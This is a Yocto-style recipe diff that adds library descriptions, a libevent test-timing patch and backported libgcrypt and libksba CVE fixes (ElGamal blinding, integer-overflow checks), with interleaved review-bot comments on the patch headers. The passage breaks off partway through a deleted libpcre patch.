index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Wrapper library for evdev devices" 1SUMMARY = "Wrapper library for evdev devices"
2DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
3the evdev ioctls through type-safe interfaces and provides functions \
4to change the appearance of the device."
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/" 5HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
3SECTION = "libs" 6SECTION = "libs"
4 7
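diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
+From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
+From: Yi Fan Yu <yifan.yu@windriver.com>
+Date: Thu, 22 Apr 2021 22:35:59 -0400
+Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
+ 100 ms
+
+The default timeout tolerance is 50 ms,
+which causes intermittent failure in many the
+related tests in arm64 QEMU.
+
+See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
+(The root cause seems to be a heavy load)
+
+Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
+---
+ test/regress.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/test/regress.h b/test/regress.h
+index f06a7669..829af4a7 100644
+--- a/test/regress.h
++++ b/test/regress.h
+@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
+ tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
+
+ #define test_timeval_diff_eq(tv1, tv2, diff) \
+- test_timeval_diff_leq((tv1), (tv2), (diff), 50)
++ test_timeval_diff_leq((tv1), (tv2), (diff), 100)
+
+ long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
+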
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
1SUMMARY = "An asynchronous event notification library" 1SUMMARY = "An asynchronous event notification library"
2DESCRIPTION = "A software library that provides asynchronous event \
3notification. The libevent API provides a mechanism to execute a callback \
4function when a specific event occurs on a file descriptor or after a \
5timeout has been reached. libevent also supports callbacks triggered \
6by signals and regular timeouts"
2HOMEPAGE = "http://libevent.org/" 7HOMEPAGE = "http://libevent.org/"
3BUGTRACKER = "https://github.com/libevent/libevent/issues" 8BUGTRACKER = "https://github.com/libevent/libevent/issues"
4SECTION = "libs" 9SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
10 file://Makefile-missing-test-dir.patch \ 15 file://Makefile-missing-test-dir.patch \
11 file://run-ptest \ 16 file://run-ptest \
12 file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \ 17 file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
18 file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
13 " 19 "
14 20
15SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531" 21SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index 3b08dc52be..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Library for reading extended image information (EXIF) from JPEG files" 1SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
2DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
3intended to replace lots of redundant implementations in command-line \
4utilities and programs with GUIs."
2HOMEPAGE = "https://libexif.github.io/" 5HOMEPAGE = "https://libexif.github.io/"
3SECTION = "libs" 6SECTION = "libs"
4LICENSE = "LGPLv2.1" 7LICENSE = "LGPLv2.1"
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for file management" 1SUMMARY = "Library for file management"
2DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 3HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 4
4LICENSE = "LGPLv2+" 5LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Library for file management" 1SUMMARY = "Library for file management"
2DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
3giving a convenient higher-level API."
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 4HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 5
4LICENSE = "GPLv2+ & LGPLv2+" 6LICENSE = "GPLv2+ & LGPLv2+"
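diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
+From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Tue, 13 Apr 2021 10:00:00 +0900
+Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
+ too.
+
+* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
+
+--
+
+Base blinding had been introduced with USE_BLINDING. This patch add
+exponent blinding as well to mitigate side-channel attack on mpi_powm.
+
+GnuPG-bug-id: 5328
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33560
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ cipher/elgamal.c | 20 +++++++++++++++++---
+ 1 file changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..9835122f 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ static void
+ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ {
+- gcry_mpi_t t1, t2, r;
++ gcry_mpi_t t1, t2, r, r1, h;
+ unsigned int nbits = mpi_get_nbits (skey->p);
++ gcry_mpi_t x_blind;
+
+ mpi_normalize (a);
+ mpi_normalize (b);
+@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+
+ t2 = mpi_snew (nbits);
+ r = mpi_new (nbits);
++ r1 = mpi_new (nbits);
++ h = mpi_new (nbits);
++ x_blind = mpi_snew (nbits);
+
+ /* We need a random number of about the prime size. The random
+ number merely needs to be unpredictable; thus we use level 0. */
+ _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
+
++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
++ mpi_set_highbit (r1, nbits - 1);
++ mpi_sub_ui (h, skey->p, 1);
++ mpi_mul (x_blind, h, r1);
++ mpi_add (x_blind, skey->x, x_blind);
++
+ /* t1 = r^x mod p */
+- mpi_powm (t1, r, skey->x, skey->p);
++ mpi_powm (t1, r, x_blind, skey->p);
+ /* t2 = (a * r)^-x mod p */
+ mpi_mulm (t2, a, r, skey->p);
+- mpi_powm (t2, t2, skey->x, skey->p);
++ mpi_powm (t2, t2, x_blind, skey->p);
+ mpi_invm (t2, t2, skey->p);
+ /* t1 = (t1 * t2) mod p*/
+ mpi_mulm (t1, t1, t2, skey->p);
+
++ mpi_free (x_blind);
++ mpi_free (h);
++ mpi_free (r1);
+ mpi_free (r);
+ mpi_free (t2);
+
+--
+2.11.0
+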
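Review bot: The patch header does not describe the code it carries: the ChangeLog line reads `* cipher/elgamal.c (do_encrypt): Also do exponent blinding.`, but both embedded hunks change `decrypt`, where `x_blind` replaces `skey->x` in the two `mpi_powm` calls. Because this header is the audit trail for the CVE fix, I would add a line below the trailers such as `Note: upstream ChangeLog names do_encrypt; the change is in decrypt().` and give the origin as `Upstream-Status: Backport [<upstream commit URL>]`, using the commit id already on the `From` line, as the libksba CVE-2022-3515 patch in this commit does. Separately, `r1` and `h` are allocated with `mpi_new` while `x_blind` uses `mpi_snew`; whether the blinding factor should also sit in secure memory is worth confirming against upstream, since the rest of `decrypt` is outside the hunks.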
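diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
+From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Fri, 21 May 2021 11:15:07 +0900
+Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
+
+* cipher/elgamal.c (gen_k): Remove support of smaller K.
+(do_encrypt): Never use smaller K.
+(sign): Folllow the change of gen_k.
+
+--
+
+Cherry-pick master commit of:
+ 632d80ef30e13de6926d503aa697f92b5dbfbc5e
+
+This change basically reverts encryption changes in two commits:
+
+ 74386120dad6b3da62db37f7044267c8ef34689b
+ 78531373a342aeb847950f404343a05e36022065
+
+Use of smaller K for ephemeral key in ElGamal encryption is only good,
+when we can guarantee that recipient's key is generated by our
+implementation (or compatible).
+
+For detail, please see:
+
+ Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
+ "On the (in)security of ElGamal in OpenPGP";
+ in the proceedings of CCS'2021.
+
+CVE-id: CVE-2021-33560
+GnuPG-bug-id: 5328
+Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-40528
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+---
+ cipher/elgamal.c | 24 ++++++------------------
+ 1 file changed, 6 insertions(+), 18 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..ae7a631e 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -66,7 +66,7 @@ static const char *elg_names[] =
+
+
+ static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
+-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
++static gcry_mpi_t gen_k (gcry_mpi_t p);
+ static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
+ gcry_mpi_t **factors);
+ static int check_secret_key (ELG_secret_key *sk);
+@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
+
+ /****************
+ * Generate a random secret exponent k from prime p, so that k is
+- * relatively prime to p-1. With SMALL_K set, k will be selected for
+- * better encryption performance - this must never be used signing!
++ * relatively prime to p-1.
+ */
+ static gcry_mpi_t
+-gen_k( gcry_mpi_t p, int small_k )
++gen_k( gcry_mpi_t p )
+ {
+ gcry_mpi_t k = mpi_alloc_secure( 0 );
+ gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
+@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
+ unsigned int nbits, nbytes;
+ char *rndbuf = NULL;
+
+- if (small_k)
+- {
+- /* Using a k much lesser than p is sufficient for encryption and
+- * it greatly improves the encryption performance. We use
+- * Wiener's table and add a large safety margin. */
+- nbits = wiener_map( orig_nbits ) * 3 / 2;
+- if( nbits >= orig_nbits )
+- BUG();
+- }
+- else
+- nbits = orig_nbits;
+-
++ nbits = orig_nbits;
+
+ nbytes = (nbits+7)/8;
+ if( DBG_CIPHER )
+@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ * error code.
+ */
+
+- k = gen_k( pkey->p, 1 );
++ k = gen_k( pkey->p );
+ mpi_powm (a, pkey->g, k, pkey->p);
+
+ /* b = (y^k * input) mod p
+@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
+ *
+ */
+ mpi_sub_ui(p_1, p_1, 1);
+- k = gen_k( skey->p, 0 /* no small K ! */ );
++ k = gen_k( skey->p );
+ mpi_powm( a, skey->g, k, skey->p );
+ mpi_mul(t, skey->x, a );
+ mpi_subm(t, input, t, p_1 );
+--
+2.30.2
+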
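Review bot: The CVE identifiers in this patch header disagree: the upstream message kept in the header says `CVE-id: CVE-2021-33560`, while the backport trailer and the file name say `CVE: CVE-2021-40528`, and the sibling CVE-2021-33560.patch in this commit claims the other id. CVE tracking relies on the `CVE:` trailer, so one line in the header explaining why this commit is mapped to CVE-2021-40528 would let a later auditor confirm that both ids are covered. `Upstream-Status: Backport` should also name its origin; the header already cites `632d80ef30e13de6926d503aa697f92b5dbfbc5e` as the master commit this was cherry-picked from. With the `small_k` branch removed from `gen_k`, it is also worth checking that `wiener_map` still has a caller, since its definition and other uses are outside the hunks.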
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 9fd3b7c8c9..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
1SUMMARY = "General purpose cryptographic library based on the code from GnuPG" 1SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
2DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
3It can also be used independently of GnuPG, but depends on its error-reporting \
4library Libgpg-error."
2HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/" 5HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 6BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4SECTION = "libs" 7SECTION = "libs"
@@ -25,6 +28,8 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
25 file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \ 28 file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
26 file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \ 29 file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
27 file://determinism.patch \ 30 file://determinism.patch \
31 file://CVE-2021-33560.patch \
32 file://CVE-2021-40528.patch \
28" 33"
29SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743" 34SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
30SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3" 35SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Small library that defines common error values for all GnuPG components" 1SUMMARY = "Small library that defines common error values for all GnuPG components"
2DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/" 3HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 4BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4 5
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
1SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library" 1SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
2DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
3and protocol data units. The iCalendar specification describes how \
4calendar clients can communicate with calendar servers so users can store \
5their calendar data and arrange meetings with other users. "
2HOMEPAGE = "https://github.com/libical/libical" 6HOMEPAGE = "https://github.com/libical/libical"
3BUGTRACKER = "https://github.com/libical/libical/issues" 7BUGTRACKER = "https://github.com/libical/libical/issues"
4LICENSE = "LGPLv2.1 | MPL-2.0" 8LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
9 file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \ 9 file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
10 file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \ 10 file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
11 " 11 "
12SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \ 12SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
13 file://0001-Makefile-cleanup-install-for-rebuilds.patch \ 13 file://0001-Makefile-cleanup-install-for-rebuilds.patch \
14 file://0001-Make-man-pages-reproducible.patch" 14 file://0001-Make-man-pages-reproducible.patch"
15SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba" 15SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
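diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
+From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Wed, 5 Oct 2022 14:19:06 +0200
+Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
+
+* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
+used sum.
+--
+
+It is quite common to have checks like
+
+ if (ti.nhdr + ti.length >= DIM(tmpbuf))
+ return gpg_error (GPG_ERR_TOO_LARGE);
+
+This patch detects possible integer overflows immmediately when
+creating the TI object.
+
+Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
+
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
+CVE: CVE-2022-3515
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/ber-help.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/ber-help.c b/src/ber-help.c
+index 81c31ed..56efb6a 100644
+--- a/src/ber-help.c
++++ b/src/ber-help.c
+@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
+ ti->length = len;
+ }
+
++ if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
++ {
++ ti->err_string = "header+length would overflow";
++ return gpg_error (GPG_ERR_EOVERFLOW);
++ }
++
+ /* Without this kludge some example certs can't be parsed */
+ if (ti->class == CLASS_UNIVERSAL && !ti->tag)
+ ti->length = 0;
+--
+2.11.0
+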
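Review bot: The guard added to `_ksba_ber_read_tl` carries no comment, and its first half (`ti->length > ti->nhdr &&`) is not needed for a wrap test on unsigned operands, so a reader cannot tell whether it is a shortcut or a deliberate exclusion. I would put `/* Reject a header+length sum that wraps, so callers can add nhdr and length safely. */` above the `if`, and confirm that both fields are unsigned in `struct tag_info` (declared outside the hunk), because the comparison is only well defined in that case. The check also runs before the existing kludge that resets `ti->length` to 0 for a universal tag of 0, so such an object with an oversized length is now rejected rather than zeroed; that looks intended but is worth stating in the patch header.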
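diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
+From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Tue, 22 Nov 2022 16:36:46 +0100
+Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
+
+* src/crl.c (parse_signature): N+N2 now checked for overflow.
+
+* src/ocsp.c (parse_response_extensions): Do not accept too large
+values.
+(parse_single_extensions): Ditto.
+--
+
+The second patch is an extra safegourd not related to the reported
+bug.
+
+GnuPG-bug-id: 6284
+Reported-by: Joseph Surin, elttam
+CVE: CVE-2022-47629
+https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/crl.c | 2 +-
+ src/ocsp.c | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/crl.c b/src/crl.c
+index 87a3fa3..9d3028e 100644
+--- a/src/crl.c
++++ b/src/crl.c
+@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
+ && !ti.is_constructed) )
+ return gpg_error (GPG_ERR_INV_CRL_OBJ);
+ n2 = ti.nhdr + ti.length;
+- if (n + n2 >= DIM(tmpbuf))
++ if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
+ return gpg_error (GPG_ERR_TOO_LARGE);
+ memcpy (tmpbuf+n, ti.buf, ti.nhdr);
+ err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
+diff --git a/src/ocsp.c b/src/ocsp.c
+index 4b26f8d..c41234e 100644
+--- a/src/ocsp.c
++++ b/src/ocsp.c
+@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
+ else
+ ocsp->good_nonce = 1;
+ }
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
+@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
+ err = parse_octet_string (&data, &datalen, &ti);
+ if (err)
+ goto leave;
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {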
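Review bot: In the `parse_response_extensions` hunk the new `ti.length > (1<<24)` bound sits after the block that ends in `ocsp->good_nonce = 1;`, so anything that block does with `ti.length` runs before the bound is enforced; the block starts outside the hunk, so this needs checking against the full function, and if it does read `ti.length` bytes the bound belongs ahead of it. The size passed to `xtrymalloc`, `sizeof *ex + strlen (oid) + ti.length`, remains an unchecked sum that is safe only because of the 16 MiB cap, which the comment could say: `/* Bail out on much too large objects; this also keeps the size sum below from wrapping. */`. In `src/crl.c`, `(n + n2) < n` is a valid wrap test only for unsigned `n` and `n2` (declared outside the hunk), and `n2 = ti.nhdr + ti.length` itself depends on the check added by CVE-2022-3515.patch in this commit.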
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Easy API to create and parse X.509 and CMS related objects" 1SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
2DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
3CMS data and related objects more easy. It provides a highlevel interface to \
4the implemented protocols and presents the data in a consistent way. The \
5library does not rely on another cryptographic library but provides \
6hooks for easy integration with Libgcrypt. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libksba/" 7HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
3LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)" 8LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
4LICENSE_${PN} = "GPLv2+ | LGPLv3+" 9LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
17 22
18UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html" 23UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
19SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ 24SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
20 file://ksba-add-pkgconfig-support.patch" 25 file://ksba-add-pkgconfig-support.patch \
26 file://CVE-2022-47629.patch \
27 file://CVE-2022-3515.patch \
28"
21 29
22SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2" 30SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
23SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340" 31SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
1SUMMARY = "A library for applications dealing with netlink sockets" 1SUMMARY = "A library for applications dealing with netlink sockets"
2DESCRIPTION = "The libnl suite is a collection of libraries providing \
3APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
4library implementing the fundamentals required to use the netlink protocol \
5such as socket handling, message construction and parsing, and sending \
6and receiving of data."
2HOMEPAGE = "http://www.infradead.org/~tgr/libnl/" 7HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
3SECTION = "libs/network" 8SECTION = "libs/network"
4 9
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
1Upstream-Status: Inappropriate [debian patch]
2
3This patch address a namespace collision with libc.
4
5Although there is no "#include <regex.h>" in the source file, at
6runtime, it's unintentionally linked to the libc version, the regcomp of
7libc is called instead the pcre one using pcre's data structure...
8that looks like a disaster.
9
10Can patch is from Debian (and Ubuntu 11.04alpha has it also).
11
12[sgw: added patch comment]
13Signed-off-by: Qing He <qing.he@intel.com>
14Signed-off-by: Saul Wold <sgw@linux.intel.com>
15
16--- a/pcreposix.h 2010-05-17 00:17:23.000000000 +0800
17+++ b/pcreposix.h 2009-01-15 04:32:17.000000000 +0800
18@@ -133,14 +130,19 @@
19
20 /* The functions */
21
22-PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
23-PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
24+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
25+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
26 regmatch_t *, int);
27-PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
28-PCREPOSIX_EXP_DECL void regfree(regex_t *);
